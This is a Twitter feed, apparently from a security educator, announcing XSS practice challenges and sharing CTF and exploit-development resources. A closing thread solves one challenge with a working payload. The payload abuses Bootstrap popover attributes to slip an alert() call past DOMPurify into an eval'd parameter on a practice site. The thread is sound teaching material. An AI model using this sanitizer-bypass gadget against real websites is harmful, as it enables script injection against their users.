-
Pinned tweet
Yo hackers! I've built a small website that has some #XSS challenges.
http://xss.pwnfunction.com
The main challenge for the week is `WW3`
All upcoming challenges will be hosted there, so stay tuned :)
Would love to know what you guys think. Have fun! pic.twitter.com/0vGboYQIY7
-
New #XSS challenge "Jason Bourne" https://xss.pwnfunction.com/challenges/bourne/ … pic.twitter.com/4dvvp4PuEK
-
PwnFunction retweeted
Last call! TODAY at a 1 PM EST Webinar on "Shellcode For The Masses" with the @ethicalhacker Network, I will introduce what #shellcode is, how it's used, discuss some binary #exploitation techniques and security mitigations, and showcase some demos! https://www.ethicalhacker.net/eh-net-tv/eh-net-live/webinar-shellcode-for-the-masses/ …
-
PwnFunction retweeted
I started writing solutions to my challenges on #justctf quite a time ago but haven't had enough time to finish it. I decided to publish these very chaotic writeups to Dominoes, Scam Generator and p&q service. #xssearch #bugbountytip https://hackmd.io/@terjanq/justctf_writeups …
-
Solutions to the #XSS challenge `WW3` on https://xss.pwnfunction.com/challenges/ww3/ Any bugs/typos, lemme know :) pic.twitter.com/uJD91nzvl3
-
Thanks for the 10k subs on YouTube! Means a lot to me :)
-
PwnFunction retweeted
I clicked on this video because of clickbait, and it turned out to contain actual great advice! https://www.youtube.com/watch?v=M6NsEDwHHiE …
-
PwnFunction retweeted
My courses are going back to GitHub and off of my website. It was really annoying running them on my website. The reverse engineering course is getting a revamp soon and a basic exploit dev course is being worked on. https://github.com/0xZ0F/Z0FCourse_ReverseEngineering …
-
PwnFunction retweeted
Voting is now open for the top 10 new web hacking techniques of 2019: https://portswigger.net/polls/top-10-web-hacking-techniques-2019 …
-
[NEW] #XSS Challenge https://xss.pwnfunction.com/challenges/ww3.html … DM me if you solved it :) Have fun! * Solutions, 1 week from now.
-
PwnFunction retweeted
First #wasm security blogpost of 2020
Some people ask me, so here is how to start fuzzing #WebAssembly APIs of #browser JavaScript engines like Chrome/V8. In this blogpost, I'm using:
Dharma/Domato
Chrome/v8 ASan pre-built
Honggfuzz ;) https://webassembly-security.com/fuzzing-wasm-javascript-dharma-chrome-v8/ …
-
PwnFunction retweeted
Loved the challenge, it was definitely a good learning experience for me. To better digest the solution, I broke it down and explained it in my own words in a slightly more verbose way (same exploit though). If anyone wants to read it, they can find it at https://github.com/Hypro999/CTF/blob/master/Wargames/Misc/pwnfunction-xsschallenge/solution.md#my-subsequent-explanation-and-takeaways …
-
[5/6] resulting number innerHTML will be `'<some popover template html code>'-alert(1337)//<some popover template html code>` now it's valid javascript that gets eval-ed.
-
[4/6] So we just need to make it a valid javascript, because it's being eval-ed. number=' name=<button data-toggle=popover data-container=number data-content="'-alert(1337)//">
-
[3/6] If number=7 name=<button data-toggle=popover data-container=number data-content="blah blah"> resulting number innerHTML will be `7<some popover template html code>blah blah<some popover template html code>`
-
[2/6] Clearly the `number` param is eval-ed, so before it lands inside `eval`, can we append some data to it? To do this bootstrap has a nice feature using popovers like using `data-container` (https://getbootstrap.com/docs/4.0/components/popovers/ …), so we set it to `number` tag.
-
-
[1/6]
* 2 parameters `number` & `name`
* `number` can be only 1 character
* `name` can be anything, but DOMPurify is used to sanitize
* The site uses bootstrap
* Goal is to make our input somehow land inside the eval
-
The #XSS challenge has ended https://twitter.com/PwnFunction/status/1211406031294586880 … Solution: http://vulnerableweb[.]site/xss/xss.php?number='&name=<button id=keanu data-toggle=popover data-container=number data-content="'-alert(document.domain)//"> (see reply for explanation)
Have fun!
* Solution(s) on 1st.